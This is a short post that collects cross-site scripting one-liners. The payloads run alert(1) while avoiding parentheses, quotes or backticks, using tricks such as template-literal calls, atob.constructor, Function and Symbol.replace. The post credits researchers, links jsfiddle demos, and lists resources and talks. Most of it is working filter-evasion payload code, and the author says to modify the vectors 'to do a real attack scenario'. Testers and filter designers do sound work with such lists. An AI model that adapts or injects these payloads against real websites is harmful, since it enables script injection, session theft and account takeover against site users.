XSS oneliners payloads that rocks your nuts!

This was a list that I use often has a reference tool that I decided to publish. If you want to contribute your welcome, just tweet me at @dsopas or something. Critics are always welcome!

BTW: the result is always to alert the number 1, if you want to do a real attack scenario just modify the vectors above.

Without parentheses and quotes

self[0X10f8809.toString`36`]`1`

PS: You can also use top instead of self to cut down 1 char.

Online: https://jsfiddle.net/hx7kypv6/ by @aemkei

x=alert,x`1`

Online: https://jsfiddle.net/0bp4b2mf/ - don't know really...

Without quotes or backticks

Object.bind(null,alert)()(1)

Online: https://jsfiddle.net/w99tv481/ by @garethheyes

Eval without eval() and without quotes

atob.constructor`alert\`1\````

Online: https://jsfiddle.net/r4tdhs1L/ by @aemkei

Other evading payloads

Function('x=alert`1`','y')()

Online: https://jsfiddle.net/qawpegx9/ by @garethheyes

/1/[Symbol.replace]('1',alert)

Online: https://jsfiddle.net/7m9ex6L8/ by @garethheyes

Array.from([1],alert)

Online: https://jsfiddle.net/ck5v3zgk/ by @garethheyes

Resources

• XSSChallengeWiki
• JSFuck - Write any JavaScript with 6 Characters
• HTML5 Security Cheatsheet
• XSS Polyglot Challenge
• XSS Mindmap

Talks

• AppSec EU 2017 Don't Trust The DOM: Bypassing XSS Mitigations Via Script Gadgets by Sebastian Lekies
• AppSec EU15 - Gareth Heyes - XSS Horror Show
• nullcon Goa 2015: ECMA Script 6 from an Attacker's Perspective by Mario Heiderich